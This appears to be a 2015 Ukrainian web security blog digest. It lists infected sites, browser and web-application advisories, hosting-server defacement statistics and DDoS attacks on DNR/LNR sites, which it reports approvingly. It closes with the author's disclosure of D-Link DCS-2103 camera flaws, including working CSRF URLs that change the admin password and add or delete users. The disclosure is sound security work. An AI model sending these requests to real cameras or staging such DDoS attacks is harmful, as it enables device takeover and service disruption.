Websecurity - Веб безпека

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://edmebel.kh.ua - інфекція була виявлена 28.10.2015. Зараз сайт входить до переліку підозрілих.
• http://aktes.com.ua - інфекція була виявлена 28.10.2015. Зараз сайт не входить до переліку підозрілих.
• http://warshavskiy.com.ua - інфекція була виявлена 28.10.2015. Зараз сайт входить до переліку підозрілих.
• http://miovoco.com - інфекція була виявлена 28.10.2015. Зараз сайт не входить до переліку підозрілих.
• http://intelweb.com.ua - інфекція була виявлена 28.10.2015. Зараз сайт не входить до переліку підозрілих.

Виявлені уразливості безпеки в Apple Safari і Webkit.

Уразливі продукти: Apple Safari 7.1, Safari 8.0, Safari 9.0.

Численні пошкодження пам’яті.

• APPLE-SA-2015-10-21-3 Safari 9.0.1 (деталі)

В даній добірці експлоіти в веб додатках:

• SAP Netweaver < 7.01 - XML External Entity Injection (деталі)
• Air Drive Plus 2.4 - Arbitrary File Upload Vulnerability (деталі)
• Watchguard XCS Remote Command Execution (деталі)
• BisonWare BisonFTP Server 3.5 - Directory Traversal Vulnerability (деталі)
• Adobe Flash - No Checks on Vector.uint Capacity Field (деталі)

Цього року відбувся новий масовий взлом сайтів на сервері Ukraine. Він відбувся з 01.02.2015 по 19.09.2015. Перший масовий взлом сайтів на сервері Ukraine відбувся раніше.

Був взломаний сервер української компанії Ukraine. Взлом складався з багатьох окремих дефейсів. Вони переважно відбулися після масового взлому сервера TheHost.

Всього був взломаний 61 сайт на сервері хостера Ukraine (IP 185.68.16.170). Перелік сайтів можете подивитися на www.zone-h.org. Від www.electrocars.com.ua до arinabirthday.com.ua.

З зазначених 61 сайтів 37 сайтів були взломані хакером ZoRRoKiN, 11 сайтів хакером aAn, 6 сайтів хакером ViRuS OS та по одному хакерами Team_CC, AlFeRoX, ByGeceMavisi, jangene_cakep, NG689Skw, HolaKo, the_warri0r.

Масові дефейси хакерами ZoRRoKiN і aAn явно був зроблені через взлом серверу хостінг провайдера. У випадку окремих дефейсів по одному або декілька сайтів, всі вони явно були зроблені при взломах окремих сайтів. Але також можлива атака на інші сайти на даному сервері через взлом одного сайту та використання уразливостей в програмному забезпеченні самого сервера.

Виявлені численні уразливості безпеки в Google Chrome і Chromium.

Уразливі продукти: Google Chrome 45, Chromium 45.

Обхід обмежень, пошкодження пам’яті, розкриття інформації.

• chromium-browser security update (деталі)

У вересні вже відбувалися DDoS атаки на сайти ДНР і ЛНР. Розповім про DDoS атаки на сайти цих терористичних організацій, що мали місце у жовтні.

Це DDoS атаки на різні сайти ДНР і ЛНР, які ГПУ визнала терористичними організаціями, а також на сайти, які підтримують їх. Що були проведені Українськими Кібер Військами.

DDoS на rv.org.ru - 01-15.10.2015
DDoS на cikdnr.ru - 01-15.10.2015
DDoS на cik-lnr.info - 01-15.10.2015
DDoS на без-вести.рф - 01-15.10.2015
DDoS на ungu.org - 01-15.10.2015
DDoS на pravdatoday.info - 01-15.10.2015
DDoS на bne.su - 01-15.10.2015
DDoS на dnrpress.ru - 01-15.10.2015
DDoS на naspravdi.info - 06-15.10.2015

Та інші сайти ДНР і ЛНР.

Таким чином українські хакери висловили протест проти цих незаконних організацій на їх сайтах. Деякі з них тимчасово не працювали, а деякі сайти припинили роботу.

В даній добірці уразливості в веб додатках:

• EMC Documentum TaskSpace Multiple Vulnerabilities (деталі)
• Incredible PBX remote command execution exploit (деталі)
• Vulnerabilities in Bugzilla (деталі)
• TestLink <= 1.9.12 (database.class.php) Path Disclosure Weakness (деталі)
• PhonerLite 2.14 SIP Soft Phone - SIP Digest Leak Information Disclosure (деталі)

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://gfw.com.ua - інфекція була виявлена 25.10.2015. Зараз сайт входить до переліку підозрілих.
• http://dosk.kiev.ua - інфекція була виявлена 25.10.2015. Зараз сайт не входить до переліку підозрілих.
• http://oltre.com.ua - інфекція була виявлена 25.10.2015. Зараз сайт входить до переліку підозрілих.
• http://mobkiosk.com - інфекція була виявлена 25.10.2015. Зараз сайт не входить до переліку підозрілих.
• http://ukraina.net.ua - інфекція була виявлена 25.10.2015. Зараз сайт не входить до переліку підозрілих.

Виявлені численні уразливості безпеки в Microsoft Internet Explorer і Microsoft Edge.

Уразливі продукти: Microsoft Internet Explorer 7, 8, 9, 10, 11 та Edge під Windows Vista, Windows 2008 Server, Windows 7, Windows 8, Windows 2012 Server, Windows 8.1, Windows 10.

Численні пошкодження пам’яті.

• Microsoft Security Bulletin MS15-106 - Critical Cumulative Security Update for Internet Explorer (3096441) (деталі)
• Microsoft Security Bulletin MS15-107 - Important Cumulative Security Update for Microsoft Edge (3096448) (деталі)

24.07.2015

У серпні, 01.08.2014, я виявив Abuse of Functionality та Cross-Site Request Forgery уразливості в D-Link DCS-2103 (веб камера). Це четверта частина дірок в DCS-2103.

Раніше я писав про CSRF та XSS уразливості в D-Link DCS-2103.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

24.10.2015

Abuse of Functionality (WASC-42):

Фіксований логін адміна: admin. Що спрощує BF і CSRF атаки.

Cross-Site Request Forgery (WASC-09):

Зміна паролю адміна:

http://site/vb.htm?adduser=admin:password:0

Додавання користувача:

http://site/vb.htm?adduser=user:pass:2

Видалення користувача:

http://site/vb.htm?deluser=user

Уразлива версія D-Link DCS-2103, Firmware 1.20. Дана модель з іншими прошивками також повинна бути вразливою.